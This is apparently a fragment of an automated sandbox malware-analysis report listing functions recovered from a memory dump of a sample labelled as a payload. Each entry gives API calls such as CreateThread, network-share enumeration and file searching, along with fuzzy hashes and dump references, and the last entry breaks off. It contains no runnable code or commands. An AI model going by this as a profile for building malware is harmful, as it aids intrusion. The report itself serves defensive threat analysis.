                                                                                                  • Opcode Fuzzy Hash: bb6a3c3766e121e2a19f77dc004879e37d6297652d8e517f37a0dba3bfca32aa
                                                                                                  • Instruction Fuzzy Hash: 1FD05E79188204BFD9012790AC03A0A7B92AF88714F449424F6AE200A2D7728120A657
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                  • String ID:
                                                                                                  • API String ID: 2799698630-0
                                                                                                  • Opcode ID: e373f277ccaa44ff3a0fa7b4b464ea6699a9d736f5526d0521bbf0b2c7d28634
                                                                                                  • Instruction ID: 281f8fae8a4bad75efb3975f80ffeeae9885255bb65e530f0a58c455be970461
                                                                                                  • Opcode Fuzzy Hash: e373f277ccaa44ff3a0fa7b4b464ea6699a9d736f5526d0521bbf0b2c7d28634
                                                                                                  • Instruction Fuzzy Hash: 30518C71D00269CAEF20DF60EC497DEBBB5BF20308F5051B9D40976251EB769A85CF52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_file_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 26237723-0
                                                                                                  • Opcode ID: 3f1de0a55bb642bb88a6144ec50eae969fb82e0d0e13c9713a6e6c55175b1a20
                                                                                                  • Instruction ID: 7311d30147ea50d896335082feb36ebdad0a80475fb96c937cfcee73d46eccf0
                                                                                                  • Opcode Fuzzy Hash: 3f1de0a55bb642bb88a6144ec50eae969fb82e0d0e13c9713a6e6c55175b1a20
                                                                                                  • Instruction Fuzzy Hash: 7E01F771800209EBCF12AFB5BC0189E7BF1AF40324F549159F62876161D775CA62DF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00E45208: __getptd_noexit.LIBCMT ref: 00E45208
                                                                                                  • __lock_file.LIBCMT ref: 00E43A7D
                                                                                                    • Part of subcall function 00E40E53: __lock.LIBCMT ref: 00E40E76
                                                                                                  • __fclose_nolock.LIBCMT ref: 00E43A88
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                  • String ID:
                                                                                                  • API String ID: 2800547568-0
                                                                                                  • Opcode ID: 4b9ee9d924772d495060588b51218ff65c78814db822ea44a610d768456cadb6
                                                                                                  • Instruction ID: fe9ad2620861cc644441f8d773c009b260af6d0bdb86c2fb22d3daf8b6ff5e93
                                                                                                  • Opcode Fuzzy Hash: 4b9ee9d924772d495060588b51218ff65c78814db822ea44a610d768456cadb6
                                                                                                  • Instruction Fuzzy Hash: F3F0E0719417049AD710BBB5B80179E7AD45F40334F20A145E4E4BB1D1CBBCC701AF55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __lock_file.LIBCMT ref: 00E43489
                                                                                                  • __ftell_nolock.LIBCMT ref: 00E43494
                                                                                                    • Part of subcall function 00E45208: __getptd_noexit.LIBCMT ref: 00E45208
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                  • String ID:
                                                                                                  • API String ID: 2999321469-0
                                                                                                  • Opcode ID: c43cff982e869852fa861984bfa5daff5c9fad82f7fc8c387eba2a56ccb60d95
                                                                                                  • Instruction ID: dba2af7a8127420a3c1cb27e9fd554a28fc3553783e57ceb08288883bc445dc5
                                                                                                  • Opcode Fuzzy Hash: c43cff982e869852fa861984bfa5daff5c9fad82f7fc8c387eba2a56ccb60d95
                                                                                                  • Instruction Fuzzy Hash: DEF0A031A022149ADB11BBF4B80279E66E05F41334F206605F030FB1C2CFBC8A025A95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E318DD
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00E318E9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseFreeHandleVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2443081362-0
                                                                                                  • Opcode ID: 0255e111134f1adf00c8b9b7169cc6c0f8865f32dcea7f4f7f1c938532ec5ac3
                                                                                                  • Instruction ID: 57e5c85ebd91135cc96c052a9d52aa4b8c21746241d94425216186d2ea73e883
                                                                                                  • Opcode Fuzzy Hash: 0255e111134f1adf00c8b9b7169cc6c0f8865f32dcea7f4f7f1c938532ec5ac3
                                                                                                  • Instruction Fuzzy Hash: F8E08636A055089BC7248B99EC8479CF374F789724F300369ED29732D047312D068954
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00E369DF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                  • String ID:
                                                                                                  • API String ID: 120817956-0
                                                                                                  • Opcode ID: cb4b33f2632e3d22e3c73e9c86d7ae3fde48f70a81242439d58996a03348b8f5
                                                                                                  • Instruction ID: ea3553ea30b1a556a813077aa1c93da6dee3ba8a55edf9644d76c1cbb7d4cff7
                                                                                                  • Opcode Fuzzy Hash: cb4b33f2632e3d22e3c73e9c86d7ae3fde48f70a81242439d58996a03348b8f5
                                                                                                  • Instruction Fuzzy Hash: 2F31B071A00605ABCB24DF78D88566ABBF8EB84714F20962DE456E7740DA309D04C7A1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00E365C5
                                                                                                    • Part of subcall function 00E43B4C: _malloc.LIBCMT ref: 00E43B64
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 657562460-0
                                                                                                  • Opcode ID: dc0323c958d444085b4a3c88eb4a9bcb7b58bb30664d171bbd95bf22b54c0ecf
                                                                                                  • Instruction ID: e7cc342853bee55eaf45bb7f46295341bc921455798f3e20fa76610d79ff3e49
                                                                                                  • Opcode Fuzzy Hash: dc0323c958d444085b4a3c88eb4a9bcb7b58bb30664d171bbd95bf22b54c0ecf
                                                                                                  • Instruction Fuzzy Hash: E621F475900115EBCB14DF6CD981B5ABFE9EF45710F048229E805AB349D730EA14CBE1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00E43B4C: _malloc.LIBCMT ref: 00E43B64
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00E3CC83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 657562460-0
                                                                                                  • Opcode ID: 883b45b638d78bcbc730765e53e8e9791008ea744b9bf590bb43f0295fe7a84c
                                                                                                  • Instruction ID: 16c8c5aa71d1cc93d97ae9bed5738b5a78ea01eefd9d962f8981acf5c6c8462b
                                                                                                  • Opcode Fuzzy Hash: 883b45b638d78bcbc730765e53e8e9791008ea744b9bf590bb43f0295fe7a84c
                                                                                                  • Instruction Fuzzy Hash: 58E086357012049FDB08DE22D455A7ABB95DF92784F24B03CEC0EBB651EA32D904D7A1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 00E3FA25
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: a315e16b0e11360ddf25257c8717f762e0be8d39389dc59aea1fca7bbb0c6a9c
                                                                                                  • Instruction ID: a105c69fd4902a0fd10f0b148130fe278ec19e5c2f62df76948a8850e7fc84a0
                                                                                                  • Opcode Fuzzy Hash: a315e16b0e11360ddf25257c8717f762e0be8d39389dc59aea1fca7bbb0c6a9c
                                                                                                  • Instruction Fuzzy Hash: 54D05E322493147BE3140A99AC06F867AD88B15B10F00402AB609EA1C0D9A1A8108698
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00E30BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00E30C12
                                                                                                  • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 00E3FDA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EnumMessageOpenSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1835186980-0
                                                                                                  • Opcode ID: 586c0bbb58918edf559f0fd76efa5518c67daadcb61c558abbe9294e76ab4e50
                                                                                                  • Instruction ID: 13148b4f29fb1d84562bf7cdd33d8d86ec4899fb697f8c4252811107cd16a0ea
                                                                                                  • Opcode Fuzzy Hash: 586c0bbb58918edf559f0fd76efa5518c67daadcb61c558abbe9294e76ab4e50
                                                                                                  • Instruction Fuzzy Hash: 2BE0C2311043446AD3209B64CC05B86BBC49F18724F00C819F68A6B9C1C5A1B00886A9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00E43B64
                                                                                                    • Part of subcall function 00E40C62: __FF_MSGBANNER.LIBCMT ref: 00E40C79
                                                                                                    • Part of subcall function 00E40C62: __NMSG_WRITE.LIBCMT ref: 00E40C80
                                                                                                    • Part of subcall function 00E40C62: RtlAllocateHeap.NTDLL(00970000,00000000,00000001,00000000,00000000,00000000,?,00E48CF4,00000000,00000000,00000000,00000000,?,00E48BE1,00000018,00F27BD0), ref: 00E40CA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 501242067-0
                                                                                                  • Opcode ID: 791ed309b585d15916319ed44a3f602a08d85d970e911ea24ac4615ea5b924dd
                                                                                                  • Instruction ID: 056db23bcdd1cbc0949a4da1826d0f5649f277b9870dc4a0750982455a1f67d8
                                                                                                  • Opcode Fuzzy Hash: 791ed309b585d15916319ed44a3f602a08d85d970e911ea24ac4615ea5b924dd
                                                                                                  • Instruction Fuzzy Hash: E3D0231050844D96AF21613C64934E5BF54C90311472013D6DC9955453DC0148158642
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00F49230), ref: 00E3FDD6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: e961a36fdf51e4abc21f91406571bcd3c639aefd04c78c372056ee16e29e4026
                                                                                                  • Instruction ID: dd27dab7bfbd9addc84cd663789171ab4191527f920189f8a952f1722310f425
                                                                                                  • Opcode Fuzzy Hash: e961a36fdf51e4abc21f91406571bcd3c639aefd04c78c372056ee16e29e4026
                                                                                                  • Instruction Fuzzy Hash: 04D0C9713893097BE7140BB5AC4BF5A3A989729B00F504069FA05E91E0DAE1E550AA5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __fsopen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3646066109-0
                                                                                                  • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                  • Instruction ID: c7f7d84b49c43c0314454a1e726c0e857993935838358914d263242a52f93183
                                                                                                  • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                  • Instruction Fuzzy Hash: 21B0927254020C77CF012E82EC02A493B599B50760F048061FB0C28161E6B7E6A99689
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
